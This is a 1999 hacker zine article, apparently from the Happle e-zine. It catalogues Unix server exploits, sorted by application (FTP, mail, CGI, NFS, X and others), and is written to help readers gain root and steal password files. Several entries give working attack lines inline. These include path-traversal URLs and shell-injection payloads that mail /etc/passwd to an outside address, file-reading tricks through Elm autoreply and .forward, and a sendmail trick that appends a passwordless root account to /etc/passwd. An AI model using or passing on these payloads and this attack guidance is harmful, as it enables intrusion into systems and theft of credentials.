home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / Happle / happle10.sit.hqx / Happle#10 / Happle Issue#10.rsrc / TEXT_144.txt < prev    next >
Text File  |  1999-06-11  |  20KB  |  344 lines

  1.  
  2.  
  3.  
  4.  
  5.  
  6.  
  7. Introduction to Hacking #1
  8.  
  9. Does it look like i care?
  10.  
  11. O.k, welps.... this is an extension of chapter 13 (irc_hacking.faq), I'm going to have to split it up into different parts, so you won't get all the info in Happle 10, or Happle 11, it will probably be an on-going thing since there is so much to cover. The only thing that I'm going to be covering in these txt's is root compromises, core dumps and passwd files, nothing in DoS attacks or anything that crashes the server. I will list the exploits under categories and give a brief description of each one ie. local or remote exploit.
  12.  
  13. I'm going to start with applications since the exploits are against all servers that run the application (unless specified), and yes i probably will not cover *everything*, but it'll be a fair bit ;). Also what code i do talk about (ie.wh0a.c) will be included in the Happle issue, so you don't have to go looking for it, ain't i nice :P
  14.  
  15. BIND
  16. ~~~~
  17. bind-CA98.05: Gives an explanation on how to obtain root access on a nameserver running BIND 4.9 and BIND 8 Releases.
  18.  
  19. bindExploit.txt: Bind is exploitable in a way that you can use netcat to obtain packet information from incoming udp/tcp connections.
  20.  
  21.  
  22. CHAT
  23. ~~~~
  24. ichat3.txt: Ichat 3.0 servers are vulnerable to an attack that lets anyone view any file on the system (eg http://chat.server.com:4080/../../../etc/passwd).
  25.  
  26. SDI-bnc.c: Code to an exploit that obtains root on the server running bnc 2.2.4 (remote exploit).
  27.  
  28. vanity.c: Same as above except in this case it exploits all bnc versions less than or equal to 2.4.4.
  29.  
  30.  
  31. COMPILE LANGUAGE
  32. ~~~~~~~~~~~~~~~~
  33. Compile language, as in compile those great .c exploits to own the system from within ;).
  34.  
  35. gcc-exploit-2: gcc, for anyone who doesn't know, is a compiler that is widely used and lots of people forget to patch themselves. Anyways versions 2.7.2.x has a buffer overflow which in turn can give you root, this is a local attack, so you have to have a user on the server.
  36.  
  37.  
  38. ENCRYPTION
  39. ~~~~~~~~~~
  40. Mmm, don't want those ppl eavesdropping in on your session, ssh is a well used program to encrypt the input and output of data. Too bad for them that ssh can be owned ;)
  41.  
  42. ssh-1.2.26.txt: This explains how version 1.2.26 oh secure shell is exploitable, so i don't really have to go through explaining it, if you wunna know about it, read it :P
  43.  
  44. sshkerb.txt: Explains how to exploit ssh-1.2.26 kerberos code, it is reasonably hard to do, but if you want to own the server.....
  45.  
  46.  
  47. FINGER
  48. ~~~~~~
  49. Well, we all know what finger is.
  50.  
  51. cfingerd.html: Exploit against cfingerd version 1.0.1, this is a local exploit and very easy to do, lets normal users perform arbitrary commands as root.
  52.  
  53. fingerd1.html: An exploit in systems running GNU in.fingerd(8) 1.37 which gives normal user root access, this is not a buffer overflow, it's just showing how crappy finger is. This is a local exploit.
  54.  
  55.  
  56. FTP
  57. ~~~
  58. File transfer protocol, a well used protocol to get one file from one computer to another via the internet. 
  59.  
  60. FTPBUG.C: A bug in wu-ftp 2.x is exploitable from local host allowing user to have a suid root shell.
  61.  
  62. ftpd.txt: An explanation on remote buffer overflows in various FTP servers that may lead to potential root compromise. 
  63. Versions: 
  64. wu-ftp 2.4.2 beta 18 and VR versions ‚⧠10
  65. Pro-ftpd 1.2.0pre1 and prior
  66. BeroFTPD prior to 1.2.0
  67.  
  68. Also explains which OS's are vulnerable, ie. SunOS is not vulnerable
  69.  
  70. ftpd1.html: Remote users can upload .rhost and therefore gain access to the server.
  71.  
  72. ftpd7.html: Core dump in systems running ftp versions 2.2 and 3.0, ftpd was patched but not completely, remote and local exploit.
  73.  
  74. ftpd8.html: Just says what OS's are vuln to ftpd attack, but does not give the exploit code, stupid whores ;).
  75.  
  76. ncftp:  Explains how to exploit ncftp 2.4.2 remotely, and you get .rhosts from the attack.
  77.  
  78. SDI-wu.c: Exploit code for wu-ftp 2.4.2 beta 18 are prior, this is a remote attack which gains root access.
  79.  
  80. security.dynamics.ftp.html: Security dynamics' FTP server (Version 2.2) can be exploited to give core dump (local access needed), this explains how.
  81.  
  82. wh0a.c: Code for the remote exploit against wu-ftp v2.4.2-beta18, which in turn gains root access, this is differently coded to SDI-wu.c, so if your crappy and can't compile SDI-wu.c try this one ;)
  83.  
  84. wu-ftp.sh: Attack against wu-ftp which lets you create a file anywhere in the system, you get core dump aswell (local).
  85.  
  86. WUFTP.TXT: Exploit against wuftp2.4(1) which can lead to suid root shell.
  87.  
  88. wuftpd-sdump.sh: You can view and assemble shadow passwd file, core dump. Remote exploit (if anonymous ftp).
  89.  
  90. wuftpd-sploit.tar.gz: Yet another wu-ftp exploit
  91.  
  92. wuftpd_umask.txt: Exploit in wu-ftpd 2.4.2-beta-13 causing core dump (666), local or remote attack.
  93.  
  94. w00f.c: Wu-ftp exploits everywhere, here's another buffer overflow remote/local exploit against wu-ftpd [12] to [18].
  95.  
  96. ftpd.locate.findutils.txt: Explains a problem with locate from findutils-4.1.24.rpm for Redhat-5.1 and 6.0 (possibly), yeah it segfaults and can be used for running arbitrary commands if root runs locate.
  97.  
  98.  
  99. MAIL
  100. ~~~~
  101. Mail mail mail, e-mail for j00. Used basically on every ISP, so it's worth while to check if you (or your ISP, and your friends ISP and that other ISP, and um anyone's computer. Just trying to be an upstanding citizen) are vulnerable to any remote or local exploits.
  102.  
  103. arpl1.html: Simple exploit against all (?) versions of The Elm Mail System (remote or local). All it basically does is send the passwd file to your home dir ie:
  104.         $ cd $HOME
  105.         $ echoh x > passwd
  106.         $ export HOME=/.secure/etc
  107.         $ autoreply passwd
  108.         $ mail geiri < /dev/null
  109. and it's in your IN box. Something to do with how suid handles the / in a filename.
  110.  
  111. autoreply.txt: Code in shell to exploit version of The Elm Mail System's autoreply(1), which can be used to make root owned file, with mode 666. This txt shows "how to become root on most affected machines by modifying root's .rhosts file.".
  112.  
  113. explpine.c: Code on a local root exploit against Pine 4.xx, this is (of course) a buffer overflow exploit and you are needed to have user on the server that is being exploited (local exploit).
  114.  
  115. foward.txt: I didn't include this exploit because it's so small i can stick it here ;) :
  116. "
  117. # a stupid bug, but it works
  118.  
  119. echo ":include:/unreadable/file" > .forward
  120. mail that account from another account
  121. and then go looking through the /var/syslog/messages
  122. you will see lines from the unreadable file.
  123. "
  124.  
  125. imap4r1-linux.sh: Imap remote root exploit, only tested on version IMAP4rev1v10.203.
  126.  
  127. imapd4.txt: All about the exploit against imap4, if you wunna know so much about it, go read it :P
  128.  
  129. imap_core.txt: Exploit against the imapd and ipop3d (if you installed pine with 3.4) that come with slackware 3.4 (also 3.3 is exploitable for the imap daemon), this is basically a core dump. 
  130.  
  131. imapx.c: A imap exploiter's best friend, exploits imap4 (x) all versions that are vulnerable. Remote exploit.
  132.  
  133. impack103.tar.gz: Imap pack with exploits against imap and imap2, also has imap subnet scanner and some other shit.
  134.  
  135. ipop3d.4.xx.bof.txt: This is a remote exploit against ipop3d 4.xx. Buff0r overflow, as it says in the txt: "The exploited overflow in ipop3d could be used to gain superuser access (the only thing done by ipop3d is setuid+setgid, no seteuid/setreuid)."  
  136.  
  137. mailrc.txt: Goes through the process of exploiting pine 3.96 on RedHat 5.0, the best you can do is be able to execute arbitrary via e-mail.
  138.  
  139. mailxploit.tar.gz: Exploit pack against mailx (by Berkly Systems) which lets users get any information available to the 'mail', can be used (potentially) to gain root access.
  140.  
  141. majord3.html: Systems running majordomo are exploitable. Any user (local or remote) can execute commands as any user on that system, not bad ;)
  142.  
  143. pine7.html: Explains about the pine 3.96 exploit, can be used locally or remotely to gain root access.
  144.  
  145. pine_exploit.sh: Shell coded vulnerability against the pine bug exploit in version 3.91 and 3.92, can be used remotely too gain root access.
  146.  
  147. pop3.c: Remote brute force hack against pop3 mail prog. Pop3 allows multiple connections and pop3 does not log bad passwd and/or bad user access.
  148.  
  149. procmail.html: /etc/passwd is nice. The exploitable procmail version v3.11pre4 lets you gain access to any file on the system, all you have too do is request it in the mail Subject.
  150.  
  151. qpop.c: Qpop exploit.... Buffer overflow in versions: 2.2, 2.2beta1, 2.4... For more info see my other file on qpoping (Happle 9). Remote exploit that lets any user gain root.
  152.  
  153. qpop242.c: Exploit against BSD's qpop 2.4beta2, BSD's qpop also has vulnerable versions 2.3 and 2.5.
  154.  
  155. qpopper-netcat.c: Exploit against qpop 2.4 using NC (netcat), remote buffer overflow exploit .
  156.  
  157. qpopper.c: Yeah, another exploit against qpop versions 2.2 and 2.4 {other variations possible, like i said read "qpoping for whores" (happle 9) if you wunna know more}
  158.  
  159. scopop-root.c: SCO POP remote root exploit. Buffer overflow. Version 2.1.4-R3 vulnerable. 
  160.  
  161. 5_5_5_1_-sendmail.txt: Yay, sendmail bugs. This txt explains how you can grab files from the server ie. passwd file, shadow file.... by exploiting good ol' sendmail remotely.
  162.  
  163. 5_6_1-sendmail.txt: With sendmail 5.61 you can basically become any user on the shell (except root) by using the code included, if you have any brains you'll use it to get super user access and go from there.
  164.  
  165. 8_6_5_1_-sendmail.txt: Rootable version of sendmail, code included (local).
  166.  
  167. 8_6_9_3_-sendmail.txt: Yeah, this version is also vulnerable.... Exploit uses ident on the sendmail host to gain passwd file. Code included.
  168.  
  169. 8_7_x_and_8_8_2_1_-sendmail.txt: Code that creates root shell on host specified that runs sendmail version/s 8.7.x and 8.8.2
  170.  
  171. 8_8_0_2_-sendmail.txt: This version of sendmail lets users to execute arbitrary commands as root via sending you mail to your machine.
  172.  
  173. 8_x_3_-sendmail.txt: Exploits sendmail(8) on SunOS creating suid root shell, code included and this is a remote exploit ;)
  174.  
  175. sendmail.8.8.4.hardlink.dead.le: On small boxes, if you can make a hard link of /etc/passwd to /var/tmp/dead.letter then telnet to port 25 of the specified host, send some mail with a bad e-mail addy and a unreachable host. Once this is done your message will get appended to passwd ie. unfy::0:0:gh12f27cs Eh h:/:/bin/sh
  176.  
  177. sendmail_875_advisory: Buffer overflow in sendmail 8.7.5, any local user can gain root access. Code included.
  178.  
  179. sendmail_buglist.txt: A very large list of what platforms are vulnerable to what sendmail bugs, nice to see if you are exploitable or not ;)
  180.  
  181.  
  182. NEWS
  183. ~~~~
  184. innd4.html:  Explains how systems running INN versions 1.5.1 and earlier are vulnerable to remote attack that allows "non-authorized" users to execute arbitrary commands.
  185.  
  186. innd5.html: Exploit for systems running INN versions 1.6 and earlier ;) This also allows remote users to execute arbitrary commands.
  187.  
  188. tin_problem.txt: Small txt, so i'll just paste it here: 
  189. "
  190. When a user runs rtin/tin a user-list will be created in /tmp/.tin_log
  191. with mode 0666. and if a user makes a symlink from /etc/passwd (or any
  192. file) to /tmp/.tin_log and root or another user with uid 0 runs rtin/tin,
  193. tin will follow the symlink to /etc/passwd and change the mode to 0666.
  194.  
  195. I hope no admin's are stupid enough to run rtin/tin as uid 0. :-)
  196. "
  197.  
  198. inn.2.x.inndstart.txt: An explanation of what INN versions are vulnerable to a particular exploit, that in turns gives root privileges. This does not give the code to exploit INN 2.x.
  199.  
  200.  
  201. NIS
  202. ~~~
  203. yp.txt: Basic exploit... Systems running Passwd+ or NPasswd and possibly other similar programs have a problem when the passwd expires (a way to force a user to change their passwd), when the users logs in it asks them to change their passwd without asking them to enter OLD passwd first, so you can just change their passwd to whatever you want.
  204.  
  205. ypbreak.c: A remote exploit that changes a users passwd via the yppasswd daemon.
  206.  
  207.  
  208. RPC
  209. ~~~
  210. portmap4.html: A bug in portmap(8) let NFS user read and write root owned files, this only effects SunOS 4.1.x and IRIX.
  211.  
  212. portmap5.html: NFS users can trick portmap into letting them access other users files, you can use this to gain root access.
  213.  
  214. rpc.mountd_bug.txt: Just explains that you can use mount to find out what files the system is using ie.sperl and use that to know what the system is vulnerable to.
  215.  
  216. wallflash.c: Some code that tries to connect to a host and exploits wall rpc file to get access to any file on the system. Remote exploit.
  217.  
  218.  
  219. X-WIN
  220. ~~~~~
  221. 312.txt: All systems with XFree86 3.1.2 installed are vulnerable to an exploit that lets users to read 'limited' portions of any file on the system. Local exploit.
  222.  
  223. kppp.txt: The kppp application that comes with KDE env is vulnerable to a buffer overflow that gives local user root shell.
  224.  
  225. xdm.html: Unix ware sets /usr/X/bin/xdm as setuid, so you can gain access to any file/duplicate the file into your dir using xdm.
  226.  
  227. xdmpasswd: Exploits xdm to overwrite files that use temp. files, you could use this with a sendmail vulnerability (linking dead.letter to /etc/passwd).
  228.  
  229. xdm_problem.txt: Xdm and CDE are vulnerable to a brute force attack ussing SSH and rlogin by bypassing host.deny and letting root access remotely where it is usually only set for console.
  230.  
  231. xfree86.txt: XFree86 3.3.1 (current), 3.2.9 and 3.1.2 are vulnerable to exploitation. Basically it lets any user have read permission anywhere on the system ie. /etc/passwd.
  232.  
  233. xit.c: Brute force hacks passwd file on the system.
  234.  
  235. XKB.insecurity.html: X11R6.3-based Xserver with XKEYBOARD extension is set as setuid so any local user can exploit a feature in XKB implementation to execute arbitrary commands.
  236.  
  237. Xserver.display.overflow.html: Buffer overflow can be executed to get root shell on systems running as X11R6-based Xserver (as setuid or setgid). Local Exploit.
  238.  
  239. xterm_exp.c: Buffer overflow against Xaw and neXtaw widgets gaining root access. Local exploit.
  240.  
  241. xview.html: Another Buffer overflow, this one is against the xview lib.
  242.  
  243.  
  244. CGI
  245. ~~~
  246. brute_ssl.c:  Basically a brute force hacker that guesses it's way through user and id prompts on a Web Server.
  247.  
  248. brute_web.c:  Another brute force hacker. This one also tries to guess passwds to a user.
  249.  
  250. netscape-ex.txt:  Any server running X-windows and netscape at the same time can be exploited to gain user on that system. 
  251.  
  252. nscape10.html: A javascript flaw in any Netscape Communicator site (4.x) can be exploited to gain user and pass.
  253.  
  254. nscape12.html: Systems running Netscape Enterprise Server 3.0 have a Javascript flaw which lets anyone gain user a pass by downloading the application to there browser, the stupid thing is that the user and pass is unencrypted ;)
  255.  
  256. nscape4.html: Any OS running Netscape 2.x, 3.x and 4.0 can be force to transfer any "known" file to a remote exploiter (via Javascript).
  257.  
  258. cgi_phf1.txt: Good ol' PHF. An exploit in PHF lets anyone access any file on the system (eg. /etc/passwd), or even get a directory listing.
  259.  
  260. excite.txt: Security hole in EWS lets any user on the system send a mail to themselves to get any file on the system. (eg. ";IFS="$";/bin/cat /etc/passwd|mail your_email_here;)
  261.  
  262. glimpse_http.txt: GlimpseHTTP has a hole in it that lets a remote attacker execute any command as the owner of that system.
  263.  
  264. htmlscript.txt: Htmlscript is vulnerable to remote executable commands, so anyone can have access to /etc/passwd or any other file on that system.
  265.  
  266. httpd50.html: Systems running Verity/Search'97 are exploitable. The exploit lets any remote user execute commands to view any file on that system.
  267.  
  268. info2www: Local users can have access to any file on the system by just asking it in the subject of a redirecting mail. (eg. REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami </etc/passwd|)' )
  269.  
  270. jscript.html: Explains that Javascript can be exploited to view any file on the vulnerable system through your browser, or even d/l it.
  271.  
  272. nscape5.html: Systems NS Communicator and connecting via squid proxy have an exploit that lets anyone view any file on the system.
  273.  
  274. phf.5: Code to exploit systems running PHF.
  275.  
  276. php.txt: PHP is also vulnerable to an attack that lets anyone execute commands to the server, this way you can gain access to /etx/passwd.
  277.  
  278. test-cgi.txt: Any system running test-cgi may be vulnerable. This vulnerability allows a remote user to gain access to the files on that system.
  279.  
  280. textcounter: Systems running textcounter can be exploited to let the attacker execute commands as the http daemon.
  281.  
  282. valueclick-cgi.txt: ValueClick has a CGI vulnerability that lets a remote user capture user/passwd file/s.
  283.  
  284. view_source.txt: Simple exploit that allows anyone to view /etc/passwd or any other file on the system.
  285.  
  286. webgais.txt: Webgais HTTP/1.0 can be exploited by a local user to gain access to any file on the system, this is done by sending an e-mail to yourself (eg. query=';mail+drazvan\@pop3.kappa.ro</etc/passwd;echo'&output=subject&domain=paragraph)
  287.  
  288. webmin.txt: Webmin servers are vulnerable to brute force attacks to guess user/passwd.
  289.  
  290. wwwcount.c: As the file says "a buffer can be overflowed in the Count.cgi program, allowing remote http users to execute arbitrary commands on the target machine."
  291.  
  292. wwwthreads.txt: The WWW Threads discussion forum software lets any remote attacker gain access to the data directory that contains user and passwds.
  293.  
  294.  
  295. NFS
  296. ~~~
  297. nfs1.html: Explains how an NFS client can gain access to any file on the system because of a flaw in the NFS system.
  298.  
  299. nfs2.html: An explanation upon NFS clients being able to edit/replace any file on the system eg. .rhosts .
  300.  
  301. nfsbug.c: A search, or a brute force search :P that tries to guess the file handle of the root user.
  302.  
  303. nfsd1.html: All NFS systems are supposedly vulnerable to an attack that allows any user to basically do whatever the fuck they want.
  304.  
  305. nfsd4.html: A reasonably basic exploit. NFS systems get a bit confused when you set 32-bit UID and have the lower order of numbers (to the right) set to zero. Since NFS uses 16-bit UID, the user can read/write any file owned by root.
  306.  
  307. nfsshell.c: An old remote exploit that tries to gain access to the NFS file system.
  308.  
  309. pcnfsd2.html: Explains how to exploits the printing on pcnfs to gain access to any file on the system as root.
  310.  
  311.  
  312. REMOTE-LOGIN
  313. ~~~~~~~~~~~~
  314. sunos.rlogin.overflow.html: Code to exploit systems running rlogin (root Compromise)
  315.  
  316.  
  317. MISC
  318. ~~~~
  319. lprm.overflow.html: Buffer overflow in lprm that allows local root compromise.
  320.  
  321. mc-kill.c: Security hole in Midnight Commander that makes core dump and also can reek havoc on the system.
  322.  
  323. mole.cfm: Any remote user can access/download any file on Cold Fusion application servers
  324.  
  325. oracle.8.0.5.intelligent.agent.: Exploit in oracle 8.0.5 that can be used to execute commands as root, or even if you have half a brain (as the document says) you are 3 commands away from becoming root.
  326.  
  327. pppd.html: Systems running pppd maybe vulnerable to exploitation that lets any user execute commands as root.
  328.  
  329. rsi-uucpd.txt: Local users on servers running BNU uucpd are able to exploit the server and get root compromise.
  330.  
  331. usr-totalswitch.txt: Systems running USR TotalSwitch can be exploited to make a memory dump which lets you view a nice little passwd to a user in plain text.
  332.  
  333. vixie.c: Code to exploiting crontab on various systems to make crontab execute arbitrary commands.
  334.  
  335. vixie2.html: An explanation to the above code.
  336.  
  337. workman_ex.txt: Exploit in workman that lets a local user to become root easily.
  338.  
  339.  
  340. That's is all I'm going to do on "applications" on unix systems, i'll be going into other unix operating systems separately and show what those systems are vulnerable to, and maybe some other shit aswell. That's all from me.
  341.  
  342. -Ferrocyanide
  343.  
  344.